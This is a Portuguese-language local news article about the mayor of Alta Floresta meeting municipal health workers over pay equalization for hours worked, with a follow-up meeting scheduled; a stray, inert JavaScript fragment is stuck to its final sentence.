Capa / Cidades / Prefeito se reúne com profissionais da saúde

Prefeito se reúne com profissionais da saúde

DSC_5490Assessoria da PMAF

O prefeito de Alta Floresta, Asiel Bezerra de Araújo, se reuniu nesta sexta-feira,4, com os servidores da rede municipal de saúde. O intuito deste encontro foi discutir a equiparação salarial com relação às horas trabalhadas para os cargos dos profissionais efetivos.
A vereadora Elisa Gomes participou do encontro, como intermediária do poder público com os representantes da classe, e parabenizou a prefeitura pela arrecadação do Imposto sobre Serviços de Qualquer Natureza (ISSQN), pois teve um aumento de quase 1 milhão de reais. “Todos os cidadãos devem pedir a nota fiscal ao realizar compras, a fim de aumentar a receita do município”, salientou, pois, o recebimento deste imposto é convertido em benefícios para a população.
Após ouvir os profissionais, o prefeito Asiel Bezerra de Araújo, propôs que os servidores formassem uma comissão de até três pessoas para se reunirem com o controlador municipal, Hebert Villarruel, e o secretário de Administração, Claudinei Souza Jesus, a fim de discutirem uma meta para verificar o que pode ser feito de acordo com a lei e da maneira mais justa para todos. “Como é um problema lá de traz, eu vou tentar resolver, hoje estou como prefeito e sou médico, entendo bem esta situação, quero no futuro poder ser lembrado por ter feito o que é certo em relação a nossa classe”, afirmou.
O chefe de Gabinete, George Danielides, juntamente com o controlador, Villarruel, já estão realizando um estudo de viabilidade para que, se possível, a situação se resolva de acordo com a Lei de Responsabilidade Fiscal.
Segundo o secretário de Administração, Claudinei Souza de Jesus, caso necessário, será necessário fazer um ajuste na folha de pagamento e fazer um estudo de maneira mais justa para equipar este percentual ao Plano de Cargo de Carreira dos Servidores (PCCS). “Quando for viável, inclusive extinguir a carga horária de 20h, pois, só tem dois servidores efetivos”, destacou.
O controlador, Villarruel, explicou também sobre enxugar a folha de pagamento, para assim ter condições de atender a demanda, contudo, depende da parte técnica e da gestão.
Por fim, o enfermeiro Fábio Francoly Franciscon, um dos articuladores dos profissionais da saúde, pediu um retorno no prazo de até 48 horas, para que se definam as reivindicações exigidas pela classe, contudo, o reencontro ficou definido, em comum acordo, para às 11 horas da próxima quarta-feira ,9.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top